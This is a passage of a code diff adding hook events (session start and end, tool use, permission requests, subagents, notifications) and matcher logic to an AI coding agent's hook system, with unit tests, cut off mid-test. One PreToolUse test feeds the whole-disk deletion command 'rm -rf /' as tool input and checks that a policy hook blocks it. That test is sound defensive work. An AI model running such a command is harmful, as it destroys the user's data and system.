PermissionSuggestion, + SubagentStartInput, + SubagentStopInput, } from './types.js'; +import { PermissionMode } from './types.js'; import { createDebugLogger } from '../utils/debugLogger.js'; const debugLogger = createDebugLogger('TRUSTED_HOOKS'); @@ -73,6 +90,241 @@ export class HookEventHandler { return this.executeHooks(HookEventName.Stop, input); } + /** + * Fire a SessionStart event + * Called when a new session starts or resumes + */ + async fireSessionStartEvent( + source: SessionStartSource, + model: string, + permissionMode?: PermissionMode, + agentType?: AgentType, + ): Promise { + const input: SessionStartInput = { + ...this.createBaseInput(HookEventName.SessionStart), + permission_mode: permissionMode ?? PermissionMode.Default, + source, + model, + agent_type: agentType, + }; + + // Pass source as context for matcher filtering + return this.executeHooks(HookEventName.SessionStart, input, { + trigger: source, + }); + } + + /** + * Fire a SessionEnd event + * Called when a session ends + */ + async fireSessionEndEvent( + reason: SessionEndReason, + ): Promise { + const input: SessionEndInput = { + ...this.createBaseInput(HookEventName.SessionEnd), + reason, + }; + + // Pass reason as context for matcher filtering + return this.executeHooks(HookEventName.SessionEnd, input, { + trigger: reason, + }); + } + + /** + * Fire a PreToolUse event + * Called before tool execution begins + */ + async firePreToolUseEvent( + toolName: string, + toolInput: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const input: PreToolUseInput = { + ...this.createBaseInput(HookEventName.PreToolUse), + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_use_id: toolUseId, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PreToolUse, input, { + toolName, + }); + } + + /** + * Fire a PostToolUse event + * Called after successful tool execution + */ + async firePostToolUseEvent( + toolName: string, + toolInput: Record, + toolResponse: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const input: PostToolUseInput = { + ...this.createBaseInput(HookEventName.PostToolUse), + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_response: toolResponse, + tool_use_id: toolUseId, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PostToolUse, input, { + toolName, + }); + } + + /** + * Fire a PostToolUseFailure event + * Called when tool execution fails + */ + async firePostToolUseFailureEvent( + toolUseId: string, + toolName: string, + toolInput: Record, + errorMessage: string, + isInterrupt?: boolean, + permissionMode?: PermissionMode, + ): Promise { + const input: PostToolUseFailureInput = { + ...this.createBaseInput(HookEventName.PostToolUseFailure), + permission_mode: permissionMode ?? PermissionMode.Default, + tool_use_id: toolUseId, + tool_name: toolName, + tool_input: toolInput, + error: errorMessage, + is_interrupt: isInterrupt, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PostToolUseFailure, input, { + toolName, + }); + } + + /** + * Fire a PreCompact event + * Called before conversation compaction begins + */ + async firePreCompactEvent( + trigger: PreCompactTrigger, + customInstructions: string = '', + ): Promise { + const input: PreCompactInput = { + ...this.createBaseInput(HookEventName.PreCompact), + trigger, + custom_instructions: customInstructions, + }; + + // Pass trigger as context for matcher filtering + return this.executeHooks(HookEventName.PreCompact, input, { + trigger, + }); + } + + /** + * Fire a Notification event + */ + async fireNotificationEvent( + message: string, + notificationType: NotificationType, + title?: string, + ): Promise { + const input: NotificationInput = { + ...this.createBaseInput(HookEventName.Notification), + message, + notification_type: notificationType, + title, + }; + + // Pass notification_type as context for matcher filtering + return this.executeHooks(HookEventName.Notification, input, { + notificationType, + }); + } + + /** + * Fire a PermissionRequest event + * Called when a permission dialog is about to be shown to the user + */ + async firePermissionRequestEvent( + toolName: string, + toolInput: Record, + permissionMode: PermissionMode, + permissionSuggestions?: PermissionSuggestion[], + ): Promise { + const input: PermissionRequestInput = { + ...this.createBaseInput(HookEventName.PermissionRequest), + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + permission_suggestions: permissionSuggestions, + }; + + // Pass tool name as context for matcher filtering + return this.executeHooks(HookEventName.PermissionRequest, input, { + toolName, + }); + } + + /** + * Fire a SubagentStart event + * Called when a subagent is spawned via the Agent tool + */ + async fireSubagentStartEvent( + agentId: string, + agentType: AgentType | string, + permissionMode: PermissionMode, + ): Promise { + const input: SubagentStartInput = { + ...this.createBaseInput(HookEventName.SubagentStart), + permission_mode: permissionMode, + agent_id: agentId, + agent_type: agentType, + }; + + // Pass agentType as context for matcher filtering + return this.executeHooks(HookEventName.SubagentStart, input, { + agentType: String(agentType), + }); + } + + /** + * Fire a SubagentStop event + * Called when a subagent has finished responding + */ + async fireSubagentStopEvent( + agentId: string, + agentType: AgentType | string, + agentTranscriptPath: string, + lastAssistantMessage: string, + stopHookActive: boolean, + permissionMode: PermissionMode, + ): Promise { + const input: SubagentStopInput = { + ...this.createBaseInput(HookEventName.SubagentStop), + permission_mode: permissionMode, + stop_hook_active: stopHookActive, + agent_id: agentId, + agent_type: agentType, + agent_transcript_path: agentTranscriptPath, + last_assistant_message: lastAssistantMessage, + }; + + // Pass agentType as context for matcher filtering + return this.executeHooks(HookEventName.SubagentStop, input, { + agentType: String(agentType), + }); + } + /** * Execute hooks for a specific event (direct execution without MessageBus) * Used as fallback when MessageBus is not available diff --git a/packages/core/src/hooks/hookPlanner.test.ts b/packages/core/src/hooks/hookPlanner.test.ts index e3bb99076..85b1aae56 100644 --- a/packages/core/src/hooks/hookPlanner.test.ts +++ b/packages/core/src/hooks/hookPlanner.test.ts @@ -245,14 +245,14 @@ describe('HookPlanner', () => { const entry: HookRegistryEntry = { config: { type: HookType.Command, command: 'echo test' }, source: HooksConfigSource.Project, - eventName: HookEventName.SessionStart, - matcher: 'user', + eventName: HookEventName.PreCompact, + matcher: 'auto', enabled: true, }; vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); - const result = planner.createExecutionPlan(HookEventName.SessionStart, { - trigger: 'user', + const result = planner.createExecutionPlan(HookEventName.PreCompact, { + trigger: 'auto', }); expect(result).not.toBeNull(); @@ -262,14 +262,14 @@ describe('HookPlanner', () => { const entry: HookRegistryEntry = { config: { type: HookType.Command, command: 'echo test' }, source: HooksConfigSource.Project, - eventName: HookEventName.SessionStart, - matcher: 'user', + eventName: HookEventName.PreCompact, + matcher: 'auto', enabled: true, }; vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); - const result = planner.createExecutionPlan(HookEventName.SessionStart, { - trigger: 'api', + const result = planner.createExecutionPlan(HookEventName.PreCompact, { + trigger: 'manual', }); expect(result).toBeNull(); @@ -362,5 +362,356 @@ describe('HookPlanner', () => { expect(result).toBeNull(); }); + + it('should match notification type with exact string', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'permission_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'permission_prompt', + }); + + expect(result).not.toBeNull(); + }); + + it('should not match notification type with different string', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'permission_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'idle_prompt', + }); + + expect(result).toBeNull(); + }); + + it('should match idle_prompt notification type', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'idle_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'idle_prompt', + }); + + expect(result).not.toBeNull(); + }); + + it('should match auth_success notification type', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'auth_success', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'auth_success', + }); + + expect(result).not.toBeNull(); + }); + + it('should match elicitation_dialog notification type', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'elicitation_dialog', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'elicitation_dialog', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when matcher is wildcard', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: '*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'any_notification_type', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when matcher is empty', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: '', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'any_notification_type', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when no matcher provided', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification, { + notificationType: 'any_notification_type', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all notification types when no context provided', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.Notification, + matcher: 'permission_prompt', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.Notification); + + expect(result).not.toBeNull(); + }); + + it('should match agent type with exact string for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: 'code-reviewer', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'code-reviewer', + }); + + expect(result).not.toBeNull(); + }); + + it('should not match agent type with different string for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: 'code-reviewer', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'qwen-tester', + }); + + expect(result).toBeNull(); + }); + + it('should match agent type with regex for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '^code-.*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'code-reviewer', + }); + + expect(result).not.toBeNull(); + }); + + it('should match agent type with wildcard for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'any-agent', + }); + + expect(result).not.toBeNull(); + }); + + it('should match all agent types when no context for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: 'code-reviewer', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart); + + expect(result).not.toBeNull(); + }); + + it('should match all agent types when no matcher for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'any-agent', + }); + + expect(result).not.toBeNull(); + }); + + it('should match agent type with exact string for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: 'qwen-tester', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'qwen-tester', + }); + + expect(result).not.toBeNull(); + }); + + it('should not match agent type with different string for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: 'qwen-tester', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'code-reviewer', + }); + + expect(result).toBeNull(); + }); + + it('should match agent type with regex for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: '.*tester$', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'qwen-tester', + }); + + expect(result).not.toBeNull(); + }); + + it('should fallback to exact match when regex is invalid for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '[invalid(regex', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: 'code-reviewer', + }); + + expect(result).toBeNull(); + }); + + it('should match using fallback exact match when regex is invalid for SubagentStart', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStart, + matcher: '[invalid(regex', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStart, { + agentType: '[invalid(regex', + }); + + expect(result).not.toBeNull(); + }); + + it('should match regex wildcard .* for SubagentStop', () => { + const entry: HookRegistryEntry = { + config: { type: HookType.Command, command: 'echo test' }, + source: HooksConfigSource.Project, + eventName: HookEventName.SubagentStop, + matcher: '.*', + enabled: true, + }; + vi.mocked(mockRegistry.getHooksForEvent).mockReturnValue([entry]); + + const result = planner.createExecutionPlan(HookEventName.SubagentStop, { + agentType: 'any-agent-type', + }); + + expect(result).not.toBeNull(); + }); }); }); diff --git a/packages/core/src/hooks/hookPlanner.ts b/packages/core/src/hooks/hookPlanner.ts index 3eef01543..23628c712 100644 --- a/packages/core/src/hooks/hookPlanner.ts +++ b/packages/core/src/hooks/hookPlanner.ts @@ -6,7 +6,7 @@ import type { HookRegistry, HookRegistryEntry } from './hookRegistry.js'; import type { HookExecutionPlan } from './types.js'; -import { getHookKey, type HookEventName } from './types.js'; +import { getHookKey, HookEventName } from './types.js'; import { createDebugLogger } from '../utils/debugLogger.js'; const debugLogger = createDebugLogger('TRUSTED_HOOKS'); @@ -34,9 +34,9 @@ export class HookPlanner { return null; } - // Filter hooks by matcher + // Filter hooks by matcher - pass eventName for explicit dispatch const matchingEntries = hookEntries.filter((entry) => - this.matchesContext(entry, context), + this.matchesContext(entry, eventName, context), ); if (matchingEntries.length === 0) { @@ -64,10 +64,14 @@ export class HookPlanner { } /** - * Check if a hook entry matches the given context + * Check if a hook entry matches the given context. + * Uses explicit event-based dispatch to avoid ambiguity between events + * that share similar context fields (e.g., SessionStart and SubagentStart + * both have agentType, but use different matcher semantics). */ private matchesContext( entry: HookRegistryEntry, + eventName: HookEventName, context?: HookEventContext, ): boolean { if (!entry.matcher || !context) { @@ -80,17 +84,80 @@ export class HookPlanner { return true; // Empty string or wildcard matches all } - // For tool events, match against tool name - if (context.toolName) { - return this.matchesToolName(matcher, context.toolName); - } + // Explicit dispatch by event name to avoid ambiguity + switch (eventName) { + // Tool events: match against tool name + case HookEventName.PreToolUse: + case HookEventName.PostToolUse: + case HookEventName.PostToolUseFailure: + case HookEventName.PermissionRequest: + return context.toolName + ? this.matchesToolName(matcher, context.toolName) + : true; - // For other events, match against trigger/source - if (context.trigger) { - return this.matchesTrigger(matcher, context.trigger); - } + // Subagent events: match against agent type + case HookEventName.SubagentStart: + case HookEventName.SubagentStop: + return context.agentType + ? this.matchesAgentType(matcher, context.agentType) + : true; - return true; + // PreCompact: match against trigger + case HookEventName.PreCompact: + return context.trigger + ? this.matchesTrigger(matcher, context.trigger) + : true; + + // Notification: match against notification type + case HookEventName.Notification: + return context.notificationType + ? this.matchesNotificationType(matcher, context.notificationType) + : true; + + // SessionStart/SessionEnd: match against source/reason + case HookEventName.SessionStart: + return context.trigger + ? this.matchesSessionTrigger(matcher, context.trigger) + : true; + + case HookEventName.SessionEnd: + return context.trigger + ? this.matchesSessionTrigger(matcher, context.trigger) + : true; + + // Events that don't support matchers: always match + case HookEventName.UserPromptSubmit: + case HookEventName.Stop: + default: + return true; + } + } + + /** + * Match notification type against matcher pattern + */ + private matchesNotificationType( + matcher: string, + notificationType: string, + ): boolean { + return matcher === notificationType; + } + + /** + * Match session source or end reason against matcher pattern + */ + private matchesSessionTrigger(matcher: string, trigger: string): boolean { + try { + // Attempt to treat the matcher as a regular expression. + const regex = new RegExp(matcher); + return regex.test(trigger); + } catch (error) { + // If it's not a valid regex, treat it as a literal string for an exact match. + debugLogger.warn( + `Invalid regex in hook matcher "${matcher}" for session trigger "${trigger}", falling back to exact match: ${error}`, + ); + return matcher === trigger; + } } /** @@ -117,6 +184,22 @@ export class HookPlanner { return matcher === trigger; } + /** + * Match agent type against matcher pattern. + * Supports regex matching, same as tool name matching. + */ + private matchesAgentType(matcher: string, agentType: string): boolean { + try { + const regex = new RegExp(matcher); + return regex.test(agentType); + } catch (error) { + debugLogger.warn( + `Invalid regex in hook matcher "${matcher}" for agent type "${agentType}", falling back to exact match: ${error}`, + ); + return matcher === agentType; + } + } + /** * Deduplicate identical hook configurations */ @@ -143,4 +226,7 @@ export class HookPlanner { export interface HookEventContext { toolName?: string; trigger?: string; + notificationType?: string; + /** Agent type for SubagentStart/SubagentStop matcher filtering */ + agentType?: string; } diff --git a/packages/core/src/hooks/hookRunner.ts b/packages/core/src/hooks/hookRunner.ts index c688e4324..26a09f350 100644 --- a/packages/core/src/hooks/hookRunner.ts +++ b/packages/core/src/hooks/hookRunner.ts @@ -408,12 +408,14 @@ export class HookRunner { // Success - treat as system message or additional context return { decision: 'allow', + reason: 'Hook executed successfully', systemMessage: text, }; } else if (exitCode === EXIT_CODE_NON_BLOCKING_ERROR) { // Non-blocking error (EXIT_CODE_NON_BLOCKING_ERROR = 1) return { decision: 'allow', + reason: `Non-blocking error: ${text}`, systemMessage: `Warning: ${text}`, }; } else { diff --git a/packages/core/src/hooks/hookSystem.test.ts b/packages/core/src/hooks/hookSystem.test.ts index 51f2d3050..b0741a829 100644 --- a/packages/core/src/hooks/hookSystem.test.ts +++ b/packages/core/src/hooks/hookSystem.test.ts @@ -15,9 +15,18 @@ import { HookType, HooksConfigSource, HookEventName, + SessionStartSource, + SessionEndReason, + PermissionMode, + AgentType, type HookDecision, + PreCompactTrigger, + NotificationType, + type PermissionSuggestion, } from './types.js'; import type { Config } from '../config/config.js'; +import type { AggregatedHookResult } from './hookAggregator.js'; +import type { HookOutput } from './types.js'; vi.mock('./hookRegistry.js'); vi.mock('./hookRunner.js'); @@ -25,6 +34,17 @@ vi.mock('./hookAggregator.js'); vi.mock('./hookPlanner.js'); vi.mock('./hookEventHandler.js'); +const createMockAggregatedResult = ( + success: boolean = true, + finalOutput?: HookOutput, +): AggregatedHookResult => ({ + success, + allOutputs: [], + errors: [], + totalDuration: 100, + finalOutput, +}); + describe('HookSystem', () => { let mockConfig: Config; let mockHookRegistry: HookRegistry; @@ -63,6 +83,16 @@ describe('HookSystem', () => { mockHookEventHandler = { fireUserPromptSubmitEvent: vi.fn(), fireStopEvent: vi.fn(), + fireSessionStartEvent: vi.fn(), + fireSessionEndEvent: vi.fn(), + firePreToolUseEvent: vi.fn(), + firePostToolUseEvent: vi.fn(), + firePostToolUseFailureEvent: vi.fn(), + firePreCompactEvent: vi.fn(), + fireNotificationEvent: vi.fn(), + firePermissionRequestEvent: vi.fn(), + fireSubagentStartEvent: vi.fn(), + fireSubagentStopEvent: vi.fn(), } as unknown as HookEventHandler; vi.mocked(HookRegistry).mockImplementation(() => mockHookRegistry); @@ -325,4 +355,1237 @@ describe('HookSystem', () => { expect(result?.getAdditionalContext()).toBe('Some additional context'); }); }); + + describe('fireSessionStartEvent', () => { + it('should fire session start event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionStartEvent( + SessionStartSource.Startup, + 'gpt-4', + ); + + expect(mockHookEventHandler.fireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Startup, + 'gpt-4', + undefined, + undefined, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionStartEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSessionStartEvent( + SessionStartSource.Clear, + 'claude-3', + PermissionMode.AutoEdit, // Using actual enum value from PermissionMode + AgentType.Custom, + ); + + expect(mockHookEventHandler.fireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Clear, + 'claude-3', + PermissionMode.AutoEdit, + AgentType.Custom, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSessionStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionStartEvent( + SessionStartSource.Startup, + 'gpt-4', + ); + + expect(result).toBeUndefined(); + }); + }); + + describe('fireSessionEndEvent', () => { + it('should fire session end event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionEndEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionEndEvent( + SessionEndReason.Other, + ); + + expect(mockHookEventHandler.fireSessionEndEvent).toHaveBeenCalledWith( + SessionEndReason.Other, + ); + expect(result).toBeDefined(); + }); + + it('should pass reason to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSessionEndEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSessionEndEvent(SessionEndReason.Other); + + expect(mockHookEventHandler.fireSessionEndEvent).toHaveBeenCalledWith( + SessionEndReason.Other, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSessionEndEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSessionEndEvent( + SessionEndReason.Other, + ); + + expect(result).toBeUndefined(); + }); + }); + + describe('firePreToolUseEvent', () => { + it('should fire PreToolUse event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'ls' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + + expect(mockHookEventHandler.firePreToolUseEvent).toHaveBeenCalledWith( + 'bash', + { command: 'ls' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePreToolUseEvent( + 'write_file', + { path: '/test.txt', content: 'test' }, + 'toolu_test456', + PermissionMode.Yolo, + ); + + expect(mockHookEventHandler.firePreToolUseEvent).toHaveBeenCalledWith( + 'write_file', + { path: '/test.txt', content: 'test' }, + 'toolu_test456', + PermissionMode.Yolo, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'ls' }, + 'toolu_test789', + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with deny decision', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'deny' as HookDecision, + reason: 'Permission denied by policy', + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'rm -rf /' }, + 'toolu_test999', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.isBlockingDecision()).toBe(true); + expect(result?.getEffectiveReason()).toBe('Permission denied by policy'); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Tool execution monitored for security', + }, + }, + }; + vi.mocked(mockHookEventHandler.firePreToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreToolUseEvent( + 'bash', + { command: 'ls' }, + 'toolu_test111', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Tool execution monitored for security', + ); + }); + }); + + describe('firePostToolUseEvent', () => { + it('should fire PostToolUse event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePostToolUseEvent( + 'bash', + { command: 'ls' }, + { output: 'file1.txt\nfile2.txt' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + + expect(mockHookEventHandler.firePostToolUseEvent).toHaveBeenCalledWith( + 'bash', + { command: 'ls' }, + { output: 'file1.txt\nfile2.txt' }, + 'toolu_test123', + PermissionMode.AutoEdit, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePostToolUseEvent( + 'read_file', + { path: '/test.txt' }, + { content: 'file content' }, + 'toolu_test456', + PermissionMode.Plan, + ); + + expect(mockHookEventHandler.firePostToolUseEvent).toHaveBeenCalledWith( + 'read_file', + { path: '/test.txt' }, + { content: 'file content' }, + 'toolu_test456', + PermissionMode.Plan, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePostToolUseEvent( + 'bash', + { command: 'ls' }, + { output: 'result' }, + 'toolu_test789', + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with system message', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + systemMessage: 'Tool executed successfully', + }, + }; + vi.mocked(mockHookEventHandler.firePostToolUseEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePostToolUseEvent( + 'bash', + { command: 'ls' }, + { output: 'result' }, + 'toolu_test999', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.systemMessage).toBe('Tool executed successfully'); + }); + }); + + describe('firePostToolUseFailureEvent', () => { + it('should fire PostToolUseFailure event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as 